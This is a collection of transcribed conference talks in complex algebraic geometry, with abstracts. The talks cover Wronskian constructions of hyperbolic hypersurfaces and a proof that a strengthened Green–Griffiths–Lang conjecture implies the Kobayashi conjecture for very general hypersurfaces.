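where \(\pi_k \colon X_k \to X_0\) is the composed projection; a local Wronskian \(W_{s_0,\dots,s_k}\) on \(U \subset X\) corresponds to a section of \(\mathcal{O}_{X_k}(k')\) over \(\pi_k^{-1}(U)\), vanishing along the Wronskian ideal introduced next.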
So I_k will be called the Wronskian ideal, of order k. And by general principles you can blow up this ideal, and you get a universal modification of the Semple bundle: you make the ideal invertible; you can take a log resolution, but it is just a modification, obtained by blowing up the Wronskian ideal. Denote by nu_k this modification map. You don't need the blow-up to be smooth; just taking the blow-up is enough. If you wanted it smooth you could proceed further, and probably there is a universal way of making it smooth, some sort of explicit equivariant desingularization that would be better. It is a very interesting question to actually understand better the structure of this Wronskian ideal; it is not completely obvious, and probably there is a better way of desingularizing than the naive blow-up. Most probably the blow-up is not always smooth; I don't know exactly. It gets complicated when k is large; you can compute for k equal to three or four, but then it becomes difficult. Okay, so X_k-hat may be singular or not; I just take the blow-up, it is enough. And of course, the pullback of the ideal by construction now becomes an invertible sheaf and therefore corresponds to a line bundle. And now I can tell you what I mean by having many sections, many Wronskians. Many Wronskians means that you have enough Wronskians to generate this line bundle after you pass to the blow-up. So "many" here means that Wronskians generate it globally; not just locally, which of course holds by the very definition of the ideal, but with global divided Wronskians, that is, Wronskians that you have divided so that they come with negative powers of the ample line bundle. And now I tell you the choice of the special sigma_0. You consider subsets J of a certain index set, of a certain cardinality c, and you have sections in H^0(Z, A); if you think of Z as a projective space like P^N, these are just hyperplanes, linear forms, indexed by j between 0 and N. Then you consider monomials m_J: products of these hyperplane sections according to J, so products of linear forms, which therefore have degree c, because J has length c. And now you take sigma_0 to be the sum of a_J m_J^delta, where you take the coefficients a_J in H^0(Z, A^rho); so the monomial part has degree c delta and the total degree of sigma_0 is rho + c delta. In fact you are going to take c equal to n, the dimension you want, delta roughly d/n, and rho small compared to delta but still much bigger than n, of the order of a power of n, approximately.
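To fix ideas, here is one way to write the section just described. The precise indexing is my reconstruction of the construction sketched on the board (in particular the convention m_J as the product of the linear forms with index in J), so treat the combinatorial details as indicative rather than as a quotation of the talk.
\[
\sigma_0 \;=\; \sum_{|J| = c} a_J\, m_J^{\,\delta},
\qquad
m_J \;=\; \prod_{j \in J} \tau_j,
\qquad
\tau_j \in H^0(Z, A),\quad a_J \in H^0(Z, A^{\rho}),
\]
so that \(\sigma_0\) has total degree \(\rho + c\,\delta\) with respect to \(A\); in the application \(c = n\), \(\delta \approx d/n\), and \(\rho\) is much smaller than \(\delta\) but much bigger than \(n\).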
And of course d is going to be very, very large, as I said something like (en)^{2n+2}, so delta is very large, and rho is just in between. Okay. So now what happens, and I have to stop in one or two minutes, is that you consider the Wronskians of these monomials, except some of them: you omit those corresponding to a certain subset J of length c. (Capital N, which I have not specified, is roughly n squared; of course you can make different choices, and then it is a matter of technology to see whether it improves the degrees or not, but these choices lead more or less to the bounds I have given; maybe you can improve.) And then, since you are missing some members because you don't take all of them, you complete the Wronskian with essentially random extra terms, just to have the correct number of entries, except that you also want a large divisibility for them. The extra terms are of the form coefficients b_l times a linear form raised to a large power, roughly d minus rho, so that you can also divide by those terms; the linear forms here are completely unrelated to the equation of the hypersurface, something you can divide by but do not care about. And now, even though in the Fermat case you would put all the monomials except one, here you put all the monomials except several of them, but it still works, because the monomials by construction share some factors: the ones that are missing share a common factor. So you get the divisibility essentially by all the powers of exponent delta minus k and by the powers of exponent d minus rho minus k of the extra linear forms, and in addition the linear combination of the missing monomials, which share a common factor, contributes exactly the extra factor that is needed to get a negative exponent. And then you do have many Wronskians, because you can choose the subset J of length c arbitrarily, which means a lot of Wronskians. If you compute, you then have to check that for general coefficients the condition that they generate L_k is satisfied; this depends on an analysis of the dimension of the base locus, but it is just linear algebra of Wronskians, nothing deep. Okay, so you have a lot of Wronskians, you do some linear algebra, you compute the base locus, and it turns out that the condition is satisfied. So this is the proof. Just a last word, in a couple of seconds: to improve on the bounds, to get better than n to the n, one has to replace Wronskians by more sophisticated elements of the bundles E_{k,m}, and one has to understand better the geometry of these E_{k,m}.
And I made an attempt in 2015 and even posted a paper to the arXiv, which I should probably remove, or at least I should tell people that there is something wrong in it. Although I do believe that most of it is correct, 99 percent is correct, there is one wrong lemma. My hope is that this wrong lemma can be replaced by a more sophisticated lemma, weaker but still sufficient. And it is all about selecting more sophisticated sections, in a very geometric way, in the Semple towers. So it is a call to young people, or others, to try to fix that lemma, which is exactly Lemma 5.1.18 in my 2015 paper. Okay, I will stop there. Thank you very much. [Chair: Do you have any questions, remarks or comments? Please wait, there is a microphone.] [Question: I think I missed one step in the proof. As far as I understood, you construct some examples of hyperbolic hypersurfaces, but why is the general one also hyperbolic?] Yes, I should have explained that; it is a very good question, which completes what I said. Once you get a bundle, which I denoted L_k, generated by sections, it is of course nef. It turns out that O_{X_k}(1) is relatively big, and by a very easy lemma you can twist by O_{X_k}(epsilon) at each level of the tower to make it actually relatively ample. But then a Q-line bundle being ample is a Zariski open condition. So once you have one example: going from nef to ample is a matter of a small perturbation of the coefficients, and once it is ample, this is a Zariski open condition in the space of parameters. So although you have produced only one example, you know that the general member is going to have a corresponding bundle that is ample, and then you use the theory of jet differentials: the ampleness of this line bundle implies Kobayashi hyperbolicity, by my Santa Cruz notes of 1995. [Other questions?] [Question: Then it implies the existence of a smooth Kobayashi-hyperbolic hypersurface with rational coefficients?] Yes, and you are one of the experts on this. It would be very interesting to specify, say, one hypersurface with integer coefficients that is known to be hyperbolic. I guess that from the proof you can extract such an example by looking at heights of coefficients and so on, but you are going to get huge bounds. So getting a nice example is going to be challenging. The proof will give it if you are extremely careful, but it is going to be terrible to do; I am sure it can be done, but probably not in a very nice way. [Chair: Other questions? Then there is a thirteen-minute coffee break.]
|
We will discuss several new ideas that can show the existence of jet differential operators on arbitrary projective varieties, and also on general hypersurfaces of $\mathbb{P}^n$ of sufficiently high degree. These results can be applied to improve degree bounds in several hyperbolicity problems and especially in the proof of the Kobayashi conjecture.
|
10.5446/53784 (DOI)
|
I want to thank the organizers for inviting me. It's wonderful to be here and I'm very excited to speak. I have two goals with my talk today. The first goal is to tell you about a new technique that I've used towards the Kobayashi conjecture, and then on other problems about hypersurfaces in projective space. I think it's likely, I hope, that it will be useful in your problems too. It's quite a general technique, so I hope to show you how it works, and hopefully someone here, or somewhere else, can use it to solve a new problem. The second part is a bit of a call to arms: roughly, this technique reduces the Kobayashi conjecture to the Green-Griffiths-Lang conjecture, so it's like: come on, let's go after the Green-Griffiths-Lang conjecture. There will be some overlap between my introduction and Jean-Pierre's, but I think it's better to say it twice than to accidentally miss something, and some of our notation is slightly different. So let's let X be a complex variety. (Later I'll try to reduce the Kobayashi conjecture to the Green-Griffiths-Lang conjecture; maybe that will be easier.) And let's define: an entire curve is a non-constant holomorphic map from C, and we say that X is Brody hyperbolic if it contains no entire curves. And then X is algebraically hyperbolic if, roughly speaking, large degree curves have to have high genus: there is some epsilon greater than zero such that for every algebraic curve C in X, 2g - 2 is at least epsilon times the degree of C, where the degree is defined with respect to some polarization. And now I have a conjecture I would like to attribute to Demailly, but I should double check with him. It's someone's conjecture, and I should write it before I ask you if it's yours. The conjecture is that X is algebraically hyperbolic if and only if X is hyperbolic. Is that fair? [Demailly: Maybe it was stated by other people before, but I stated it myself.] Excellent, so I'm safe. So Jean-Pierre proved this direction: if you're hyperbolic, then it's known that you are algebraically hyperbolic; and it's expected, or hoped, that algebraically hyperbolic implies hyperbolic. I want to mention one other general conjecture (I have several), the Green-Griffiths-Lang conjecture, which I'll abbreviate GGL: if X is of general type, then there is some proper subvariety V of X that contains all the entire curves. Now, I love hypersurfaces, so for the rest of the talk I'm going to focus on the case of hypersurfaces, and I'll set notation here once and for all. Let X be the vanishing set of a polynomial F in P^n; X will have degree d; and let it be very general, which means that in the moduli space of hypersurfaces it lies in the complement of a countable union of proper subvarieties. A lot of what I say works for general too, but I find it too annoying to keep switching between general and very general. And in the case of hypersurfaces, general type is equivalent to d being at least n + 2; so when I say general type, that's what I mean.
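Restating the definition just given in symbols, with g the geometric genus of the curve, which is the standard reading of the condition; the speaker does not specify this on the board.
\[
X \ \text{is algebraically hyperbolic} \iff
\exists\, \varepsilon > 0 \ \text{such that}\ 
2g(C) - 2 \;\ge\; \varepsilon \deg_H C
\quad \text{for every algebraic curve } C \subset X,
\]
where \(H\) is a fixed polarization.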
And so the Green-Griffiths-Lang conjecture here says that if d is at least n + 2 and X is a smooth hypersurface, so certainly for a very general one, then there is some proper subvariety that contains all the entire curves. There is a stronger conjecture, the Kobayashi conjecture, which I'll abbreviate conjecture K. It says (this is slightly different from what Jean-Pierre said, but certainly in the same spirit) that if d is at least 2n + 1 then X is hyperbolic; so I'm calling "the Kobayashi conjecture" the version with the strong bound. There is some dispute about exactly what the right bound should be, particularly this constant; there is some disagreement, or kerfuffle, about exactly the right one. I'm going to present evidence for this bound. You might argue that you should be able to do 2n - 2 for very large n, and I don't have any evidence for that. So remember, we expect X to be hyperbolic if it is algebraically hyperbolic. So, like Jean-Pierre was saying, we should think about when X is algebraically hyperbolic, and a lot of the same results he mentioned prove algebraic hyperbolicity. So: X is algebraically hyperbolic if d is at least 2n; this follows from work of Ein. And if d is at least 2n - 1 and n is at least 4, this follows from work of Voisin. And I should mention Xu's name here too: he proved that quintics in P^3, which aren't quite covered by this, contain no rational or elliptic curves, which is not quite algebraic hyperbolicity but very close. So this was in the 80s and 90s, and then there was that one last case, the quintic surfaces, and Izzet Coskun and I recently polished off that last case. So if d is at least 2n - 1 then we know that X is algebraically hyperbolic. You might ask whether this can be improved, and the answer is: not for all n. If n is 3, suppose we wanted the same result for 2n - 2; that's equal to 4, and so this is the K3 surface, and it is well known that these are not algebraically hyperbolic; they have rational curves, in fact lots of elliptic curves. So that's what we expect: we expect X to be hyperbolic if d is at least 2n - 1. Let's talk about what we know, as of January 2018; there have been some very fast new results on this, so I'm going to separate things that happened in January 2018 and earlier from things within the last year. And there has been so much great work on the Green-Griffiths-Lang conjecture, even just for hypersurfaces, that I'm going to write a bunch of names down, and I'm sorry if I missed you; there are probably more names that I forgot. So Darondeau (and these aren't in chronological order either, unfortunately; I should have done that, well, too late). And then McQuillan and Paun have work for P^3, and a particularly important result was by Diverio, Merker and Rousseau. And then Demailly has some improvements on their bounds, and there are more people. But the best bound I know of is roughly (n log(n log n))^n. Oh, yes, sorry: the Green-Griffiths-Lang conjecture is known for this range of degrees. Is there anything I need to erase and rewrite, or is this okay? And then I'll write bigger going forward.
And then for the Kobayashi conjecture: some of the names to mention here are Siu and Brotbek and Deng and Demailly, and I think that's actually most of them; the results on the Kobayashi conjecture are more recent. They prove conjecture K for d at least, I wrote down, one fifth of (en)^{2n}. So then, in June of 2018, David Yang and I proved (I'll talk more about the technicalities later) that a slightly stronger form of the Green-Griffiths-Lang conjecture for d at least d_N, for all N, implies the Kobayashi conjecture for d at least d_{2n-3}. So, roughly speaking, if you know the Green-Griffiths-Lang conjecture, you get the Kobayashi conjecture in about half the dimension. So that was in June, and then Merker, in July of 2018, had an immediate improvement of the bound, and then in January 2019, just last month (I won't write all the bounds, because otherwise we would be here all day, but I'll write the current best one that I know), Merker and Ta proved the Green-Griffiths-Lang conjecture for d at least (sqrt(n log n))^n, and then used our results to prove the Kobayashi conjecture for d at least roughly (n log n)^n. [Yes, sorry: the Green-Griffiths-Lang conjecture for a general hypersurface. Everything I say from now on is about hypersurfaces.] Are there any questions at this point? Well, let's talk a little bit about some of the proofs. First I have to introduce a lot of this; Jean-Pierre did it probably better than I'm about to, but I'm going to say it again anyway. So a k-jet of X is a map from Spec C[epsilon]/(epsilon^{k+1}) to X, and let's let J_k X be the space of k-jets of X. How do I think of these k-jets? I have my entire curve C mapping to X, so the image is some entire curve, and I have the origin here; the map is given by a power series, and I can truncate the power series to order k, and that gives me a k-jet. And even though I started with something analytic, because I truncated my power series there are only finitely many terms, and I end up with something algebraic. And so the idea of the techniques in this subject is that, to study the analytic thing, you study the algebraic space of jets, and you want to study conditions on the space of jets that come from an entire curve. And how do we get conditions on the space of jets? Well, Jean-Pierre gave a lot of detail on this, and I'm mostly just going to quote the result he stated. It is due to a lot of people, again Bloch, and then Green and Griffiths and Demailly and more: there is a vector bundle E_{k,m} T_X^* twisted by O(-1) whose sections act on the space of k-jets of X. This vector bundle has lots of properties, but I want to focus on two particularly nice ones. The first is that it has nice functorial properties. What do I mean by this? I mean that if you have a family of varieties, then you get a family of these vector bundles; and if you have an inclusion of varieties (these are the jet differential operators), then a jet differential operator on the bigger variety can be restricted to a subvariety, and it still gives you an operator.
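For reference, the jet-space definition just given, in symbols; the truncation description is the standard way to read it.
\[
J_k X \;=\; \operatorname{Hom}\bigl(\operatorname{Spec}\mathbb{C}[\varepsilon]/(\varepsilon^{k+1}),\, X\bigr),
\]
and truncating the power series of an entire curve \(f\colon \mathbb{C} \to X\) at a point to order \(k\) produces an element of \(J_k X\), on which the sections of \(E_{k,m}T_X^{*}\otimes\mathcal{O}(-1)\) act.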
And then the second property is the vanishing theorem that Jean-Pierre was describing: H^0 of E_{k,m} T_X^* twisted by O(-1) vanishes on jets coming from entire curves. So if you're trying to prove the Green-Griffiths-Lang conjecture or the Kobayashi conjecture, which many of us in this room are, what you do is study these equations that your entire curves have to satisfy, and then hope you can show that there are none. I want to give a rough outline of the steps used to prove the Kobayashi conjecture, which unfortunately won't match perfectly with what Jean-Pierre said; it's more of a historical overview of some of the major steps. One way to do it, which many people have taken: step one, you show that you have these sections, that E_{k,m} T_X^* tensored with O(-1) is non-zero; it does you no good to have these equations if they are all zero. Step two, you analyze the sections in various ways to show the Green-Griffiths-Lang conjecture, that is, that through a general point of X there are no entire curves, which is a lot weaker than the Kobayashi conjecture; it's much harder to control the bad locus for the Kobayashi conjecture. Step one is difficult, step two is even more difficult. And then step three (at least it was the last of the steps to happen historically): you have to do more work to show that this bad set is empty. The technique I'm talking about does nothing for step one and nothing for step two, currently; you would need some very clever idea to make progress on steps one and two with this technique. But we completely solve step three, and in such a way that as people make improvements on steps one and two, our result will immediately solve step three for them. So again, those are the two steps left, and we solve step three. Now I want to talk about the general setting. What we actually prove is a slightly more technical result, and I want to explain why this more technical-looking result does what we claim it does. We're trying to prove something for a general hypersurface. So here we have our family of hypersurfaces; for each point of the base we have a hypersurface, and we construct the universal hypersurface. As we vary in the family, each hypersurface has a bad locus, and the functoriality properties of E_{k,m} show that the bad loci move together nicely in a family: they form a locally closed subvariety of the universal hypersurface. So let me give some notation; this is the bad locus, and I'm going to give names to these things in a second. But first, the definition. Let U_{n,d} be the universal hypersurface: it is just the set of pairs (p, X) such that X in P^n is a degree d hypersurface and p is a point of X.
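In symbols, the two objects just introduced; this is a recap, with the vanishing statement written the way it is used below.
\[
\mathcal{U}_{n,d} \;=\; \bigl\{\,(p, X)\ :\ X \subset \mathbb{P}^n \ \text{a degree-}d\ \text{hypersurface},\ p \in X \,\bigr\},
\]
\[
H^0\bigl(X, E_{k,m}T_X^{*}\otimes\mathcal{O}(-1)\bigr)\ \text{vanishes on every }k\text{-jet obtained from an entire curve in }X .
\]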
And this maps naturally to P^n, just by remembering the point, and it also maps naturally to the space of hypersurfaces. Then I want a subvariety of this universal hypersurface: the subvariety B is just the bad locus, the set of pairs (p, X) such that p is bad for X. What does it mean for p to be bad for X? It means that our differential equations don't fully restrict all the potential entire curves through that point. The technical condition is that there exists a non-singular k-jet J in X through p such that all sections of H^0(E_{k,m} T_X^* tensor O(-1)) vanish on J. So we have this bad locus: all the points where there is a bad k-jet, one that could come from an entire curve in the sense that our differential equations do not rule it out. And so what do we want to do? If we can show that this bad locus is very small, that it has high codimension in U_{n,d}, then there is no way it could possibly dominate the moduli space of all X: it would be too small, and so the image cannot be dominant. That would mean a general X has no bad locus, and so would have to be hyperbolic. So let me write that remark down: if B has high codimension in U, then B does not dominate. Now let me tell you the theorem that David and I actually prove, and I'm going to call it theorem star so that I can refer back to it. The theorem is not about jet differentials; it is just about universal hypersurfaces with picked-out families. Let m be a natural number, and for every n and d let S_{n,d} be a locally closed subvariety, or a countable union of locally closed subvarieties, of U_{n,d}. So we have an integer and a family of loci, and we want them to satisfy two conditions. First, the codimension of S_{m,d} in U_{m,d} is at least one; this says that at some point the bad locus can't be everything, which is exactly the Green-Griffiths-Lang conjecture. And second, a naturalness or functoriality condition: if (p, X_0) lies in S_{n,d}, where X_0 is a linear section of some bigger X which you didn't know to start with was bad, then, because the linear section was bad, the larger one has to be bad too, so (p, X) also lies in the corresponding S. And now the conclusion: the codimension of S_{m-c,d} in U_{m-c,d} is at least c + 1. What this is saying is: you have a family of bad loci in your universal hypersurfaces; you know very little about this family except that it is algebraic, that at some point it stops being the entire universal hypersurface, and that any time a linear section is bad, the original hypersurface had to be bad. Then you know that, starting at m, every time you chop by a hyperplane the bad locus gets smaller. And you can see how this would be really useful: we're trying to bound the bad locus, so we just keep chopping by hyperplanes, about n/2 of them, until the codimension gets so high that it is bigger than the dimension, and that is what gives the result. So, writing it a little more pedantically on the board, to see that star implies the theorem that I stated earlier: star shows that the Green-Griffiths-Lang conjecture implies the Kobayashi conjecture.
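The shape of theorem star, in one line; this is only a sketch, and the hypotheses on S are exactly the two conditions spelled out above.
\[
\operatorname{codim}\bigl(S_{m,d},\, \mathcal{U}_{m,d}\bigr) \ge 1
\ \ \text{plus the linear-section naturality condition}
\quad\Longrightarrow\quad
\operatorname{codim}\bigl(S_{m-c,d},\, \mathcal{U}_{m-c,d}\bigr) \ge c + 1 .
\]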
So we just need to check conditions 1 and 2. For condition 1: if we let S_{n,d} be the bad locus B_{n,d}, then condition 1 corresponds exactly to the stronger version of the Green-Griffiths-Lang conjecture. I want to say that these jet differentials cut out a proper subvariety of the universal hypersurface; and currently, when people prove the Green-Griffiths-Lang conjecture for hypersurfaces, this is what they prove, the stronger version. And condition 2 is exactly implied by the functoriality of E_{k,m} (oh no, another two m's; maybe I'll call this one r, so m doesn't get overloaded). So this is implied by functoriality; let's think it through slowly. Suppose we have a hypersurface X_0 which is a linear section of X, and J is a non-vertical k-jet in X_0 on which all of H^0(X_0, E_{k,r} T_{X_0}^* tensor O(-1)) vanishes, so J is a jet that is not restricted by our differential equations. Then, since X_0 is included in X, that very naturally gives a jet of the bigger X, and we have the restriction maps on sections going the other way. If all of our sections on X_0 vanish on J, then certainly all the sections on X have to vanish on it: if we had a section on X that did not vanish on J, we would just restrict it to X_0, and it would not vanish on the restriction. So that slightly awkwardly stated condition 2 is actually very natural in our circumstances, saying: do you have a bad k-jet? If your smaller hypersurface has a bad k-jet, then your larger hypersurface still has that exact same bad k-jet. So this shows that H^0(X, E_{k,r} T_X^* tensor O(-1)) vanishes on J, and that means the pair (p, X) has to be bad. And so that theorem (no, that's someone else's very famous theorem up there), the theorem that Green-Griffiths-Lang implies Kobayashi, is just a formal consequence of theorem star. And you can see that theorem star is stated in very general terms, so if you're working with some other bad property and you want to show that a very general hypersurface doesn't have it, you can try to use it. I want to spend the rest of the time talking about the proof of the theorem, because, almost because it's so general, the proof is short and fairly easy: I don't have any complicated machinery floating around to use, so it has to be simple, because there is nothing to complicate it. So let's do it. I first need a proposition about Grassmannians. Proposition: let A be a subvariety of a Grassmannian of (k-1)-planes; let it be non-empty and of codimension at least one; and let C be the set of k-planes containing some element of A.
Right, so the words are a little complicated, but you just take some family of (k-1)-planes and then take all of the k-planes that contain one of them, and the result is that there have to be comparatively more such k-planes: the codimension has to go down. The proof is not difficult. I'll write down the incidence correspondence, and the technically correct way to finish would be a dimension count; I'll wave my hands at the dimension count to argue why it gives what you want. Proof: we have the natural incidence correspondence I, the set of pairs (Lambda, Phi), a (k-1)-plane and a k-plane, such that the (k-1)-plane is contained in the k-plane. This maps to the space of (k-1)-planes and to the space of k-planes. So here, take A of codimension epsilon, and consider the subvariety of I consisting of pairs (A, C) such that A is in A and A is contained in C. This maps naturally to A, and the fibers are the same as for the full incidence correspondence: for any A you take all the C's containing it, so the fibers have codimension zero, and that means this subvariety has codimension epsilon in I. Now look at the map down to the k-planes: given a k-plane C, the fiber over it is just all the A in A contained in it, and I claim that this cannot possibly be all the (k-1)-planes in C; it has to be of codimension at least one. Hence the codimension of the image C is at most epsilon minus 1. Let me draw a picture to argue why that last fiber had to have codimension at least one. If that fiber were also of codimension zero, then you would have the following situation: every time a k-plane of C contains an element of A it is in C, and every (k-1)-plane contained in an element of C is in A. So what you do is start with two k-planes, one of them in C, and connect them by a chain of planes where consecutive ones share a (k-1)-plane. If the first one is in C, then the shared (k-1)-plane is in A, so the next k-plane is in C, so the next shared (k-1)-plane is in A, and so on; everything ends up in C and in A, which contradicts A having codimension at least one. It's a little hard to do on the board, but it's not a hard statement and it's not a technical proof. And so now I want to explain how, given this proposition, I can prove our main theorem. (Let me figure out how to use these boards again; no, wrong one.) What I'm going to do is tell you the proof modulo two lies, and then I'm going to tell you what the two lies were. They don't seriously add to the difficulty, but they do add to the amount of notation and symbols on the board.
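The proposition just proved, in symbols; this is a sketch, with G denoting the ambient Grassmannians of (k-1)-planes and k-planes as above.
\[
A \subset G(k-1),\quad A \neq \emptyset,\quad \operatorname{codim} A = \varepsilon \ge 1,
\qquad
\mathcal{C} := \{\, \Phi \in G(k) \ :\ \exists\, \Lambda \in A,\ \Lambda \subset \Phi \,\}
\ \Longrightarrow\ 
\operatorname{codim} \mathcal{C} \;\le\; \varepsilon - 1 .
\]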
I think it's better to be able to; this is really about looking at it right, and once you look at it right, it's clear, and then it's not so hard to fill in the details. So let's do the idea of the proof. The idea is that you take some enormous hypersurface Y in some gigantic P^N (you can tell it's big because it's a capital letter), of degree D, with capital N much bigger than zero. And let's suppose for a second (this is one of the lies, but it's not so hard to fix): I've got a bigger Y here, here's Y, and we have a point here. Suppose that Y is so big that, for some n... ah, I need one more piece of notation, which I have over here. Let's let G_{n,p} be the set of n-planes through p. So for any Y we have a natural map from the space of n-planes through p: we take an n-plane through p, we intersect it with Y, and we get a map to U_{n,D}. What we're going to assume is that this map is surjective, which you can't quite do; there needs to be a fix, but that's roughly the idea. The map just takes an n-plane and sends it to the pair (p, Y intersected with that n-plane). So suppose, to get a contradiction, that S_{M-c,D} in U_{M-c,D} has codimension at most c, smaller than what we want; suppose that this bad locus is too big. Then... oh, I need a name for this map; it's going to be alpha_n, and I need to rescue the board from the top. So we have this map from the Grassmannian of planes through p to the space of pairs (point, hypersurface), and we've assumed that S_{M-c,D} is too big. Our proposition is about Grassmannians, right? So we should try to get Grassmannians in somehow. Let's pull back S_{M-c} by our alpha, or alpha_{M-c}, rather. If we take the preimage of S_{M-c} (I'll need some more board), then when you take a preimage like that, the codimension can't go up, right? This S_{M-c} is generically Cohen-Macaulay, so it's generically cut out by however many equations, and when you pull it back, you have just the same equations cutting it out. So the codimension could go down, but it can't go up. So this preimage in the Grassmannian has codimension at most c. Let's let this be the A from our proposition; it's a subvariety of a Grassmannian. Now, what is C? It's just all the (M-c+1)-planes containing one of these things, and that will certainly be contained in the preimage of the bad locus one dimension up, by property 2. So this means that if we take the alpha_{M-c+1} inverse image of S_{M-c+1,D}, then in the Grassmannian of (M-c+1)-planes this has smaller codimension, at most c-1. Here this takes the place of our A, and I'm claiming this takes the place of our C; it could actually contain C, but if it is even bigger, that only makes it worse. And now we run the argument again, right? We let this be our A, and we look at all the (M-c+2)-planes containing it.
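The whole induction fits in one displayed implication; here $\alpha_m$ is the "slice Y by an $m$-plane through $p$" map just introduced, and the codimensions are taken in the corresponding Grassmannians of planes through $p$. The indexing is mine, following the board.

```latex
% One step: the Grassmannian proposition plus condition 2 (bad jets survive
% passing to a bigger linear section) give
\[
\operatorname{codim}\ \alpha_{m}^{-1}\big(S_{m,D}\big)\ \le\ c
\quad\Longrightarrow\quad
\operatorname{codim}\ \alpha_{m+1}^{-1}\big(S_{m+1,D}\big)\ \le\ c-1 .
\]
% Starting from codimension at most c at level M - c and iterating c times
% forces codimension at most 0 at level M, i.e. the bad locus is everything,
% contradicting condition 1.
```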
And so then our codimension has to go down yet again, and we do it again and again. Eventually we get to the alpha_M inverse image of S_{M,D}, and we have gone enough steps that this has to have codimension at most zero, which contradicts condition 1. And that's it. Those are the essential ideas. I told you I told a couple of lies, so let me just hint at a couple of small things you would have to fix to get a fully correct proof. The first one is that this map alpha, which was all the way up there, is technically only defined up to automorphism of our n-plane, so you need to pick coordinates on your Grassmannian. It's no serious obstacle, but you have to work with parameterized n-planes instead of just the Grassmannian; you just add a parameterization and all the same statements are still true. And the second thing you have to work around is that alpha_n is not necessarily surjective. So how do you deal with this? All we need to do is work locally: we want to show that, locally around general points of components, S has the right dimension. So you work locally around a pair (p, X_0) in S_{n,D}: you pick the point you want to work locally around, and then you pick your Y to be big enough so that it has that pointed hypersurface as a linear section, and also has a good point as a linear section, which you know exists by hypothesis. And then you run the same argument. But I think it's just too confusing to do on the board with all of the same symbols. Are there any questions here? That was the main technique; I have a couple of last comments, but that was what I wanted to get across. Why? So, I hinted at this: I think the implications for the Kobayashi conjecture are clear. If you want to prove the Kobayashi conjecture, you go after the Green–Griffiths–Lang conjecture, and that's simple. I want to give some ideas of a couple of other instances where this technique has been useful, and hopefully give you some ideas of other places to use it. I think it works best for hypersurfaces or complete intersections, and I don't know a way to get around that, but there are lots of different types of properties of them you might want to study with this result. So, a couple of other uses. It's a good way to restrict subvarieties of hypersurfaces: David Yang and I proved that if you give me a family of varieties and a dimension of hypersurface, then I can pick a degree large enough so that my very general hypersurface of that degree contains no varieties from your family. So large-degree hypersurfaces avoid any particular family of varieties that you want. Another use: you can use it to restrict rational curves in the space of lines of X. This is probably not a variety many of you are used to thinking about if you're used to thinking about the Kobayashi conjecture, because there D is very large; but when D gets a little bit smaller, you start having these subvarieties, you start having lines on your hypersurface.
And for the Green–Griffiths–Lang conjecture, the lines certainly have to be in the bad locus, because lines have lots of entire curves. But if you look at the space of lines, and the locus they sweep out, David Yang and I proved that for D at least about 3n/2 there are no other rational curves in that locus: there are the lines, but nothing else. Somehow having the lines has soaked up all of the positivity possible, and the rest of it is very positive. Another application: we can think about CH_0 of hypersurfaces, the group of zero-cycles on the hypersurface up to rational equivalence. There is a conjecture, of either Voisin or of Chen, Lewis and Sheng, depending on which paper you look at, that says precisely how many points on your hypersurface can be rationally equivalent to each other. This technique almost immediately gives all but one of the cases of that conjecture. The one remaining case was done in a difficult paper by Chen, Lewis and Sheng; the large-degree cases had been done by Voisin; and the smaller-degree cases were open. So we just completely finished off that conjecture. That was actually our original motivation for looking at this technique in this generality, and the Kobayashi stuff was almost a bonus. And then the last application, which is more connected to what people here think about, is complete intersections with ample cotangent bundle. There is a conjecture of Debarre; I will state the conjecture, and I'll say that there have been some results but I won't write them down, so that I can end on time. So it's a conjecture of Debarre that if you take a complete intersection in projective space of half the dimension, so the codimension is equal to the dimension, and the degrees are large enough, then the cotangent bundle of that complete intersection will be ample. And Brotbek and Darondeau, and Xie at about the same time, proved it not very long ago. Do you remember the year? Yeah, just a couple of years ago. But the bounds they got were large: the degree had to be at least something like N to the N squared. So if you're trying to bring the bound down, you have to sacrifice something: we don't get the full strength of the result in terms of codimension, but we get a better bound on degree, a polynomial bound on degree, as long as you assume that the codimension is at least twice the dimension instead of at least the dimension. So let me write down the conjecture: if X in P^N is a very general n-dimensional complete intersection of type (d_1, ..., d_c), with c at least n and d_i much greater than zero for all i, then Omega_X is ample. I'm going to stop there because I don't have time. Thank you.
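For reference, here is the conjecture of Debarre just stated, in display form; the multidegree notation is my transcription of the board.

```latex
% Conjecture (Debarre).  If X \subset P^N is a very general complete
% intersection of multidegree (d_1, ..., d_c) with
\[
c \ \ge\ \dim X
\qquad\text{and}\qquad
d_i \gg 0 \quad\text{for all } i,
\]
% then the cotangent bundle \Omega^1_X is ample.  The variant in the talk
% trades the hypothesis c >= dim X for c >= 2 dim X in exchange for a
% polynomial bound on the degrees.
```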
Wow, thank you very much. So, any questions or comments or remarks? How specific is this to P^N; I mean, can you use it for flag varieties or something? For flag varieties, I'm not sure; we haven't thought about it. What you would need: this Grassmannian lemma, you would need to recover it for flag varieties, and then the other... maybe you could... and then the other important property. Sorry, I'm trying to prove it and talk at the same time; it's a bad idea. So you'd need to recover that lemma, and then you'd also need the following: it's important to the proof that, given two pointed hypersurfaces, I can find a third one, a big-dimensional one, where the two smaller ones are linear sections of it. You would also need to prove that for flag varieties. But it doesn't sound out of the question. Other questions? Wait, wait, please. Did you try to get some degree bounds on the bad loci in the moduli spaces? If you know degrees for the generic Green–Griffiths–Lang conjecture, can you get a degree for... Yeah, I should have said that; I've erased it, but if you assume the optimal Green–Griffiths–Lang, for d at least n + 2, then you get d at least 2n - 1. No, no, I don't mean that degree; I mean the degree of the bad locus, the degree of the bad locus. Of course it's going to be something terrible. Oh, absolutely huge. But since you construct the bad locus for the Kobayashi conjecture from a number of geometric constructions starting from the Green–Griffiths–Lang conjecture, there should be some relation in terms of degrees, maybe. Yeah, I haven't thought about that at all; I have no idea. That's a good question. Other questions? Okay, so thanks again. I will try to fix that a little bit. Thank you. All right, so finally... next one, okay...
|
An entire curve on a complex variety is a holomorphic map from the complex numbers to the variety. We discuss two well-known conjectures on entire curves on very general high-degree hypersurfaces $X$ in $\mathbb{P}^n$: the Green–Griffiths–Lang Conjecture, which says that the entire curves lie in a proper subvariety of $X$, and the Kobayashi Conjecture, which says that $X$ contains no entire curves. We prove that (a slightly strengthened version of) the Green–Griffiths–Lang Conjecture in dimension $2n$ implies the Kobayashi Conjecture in dimension $n$. The technique has already led to improved bounds for the Kobayashi Conjecture.
|
10.5446/53786 (DOI)
|
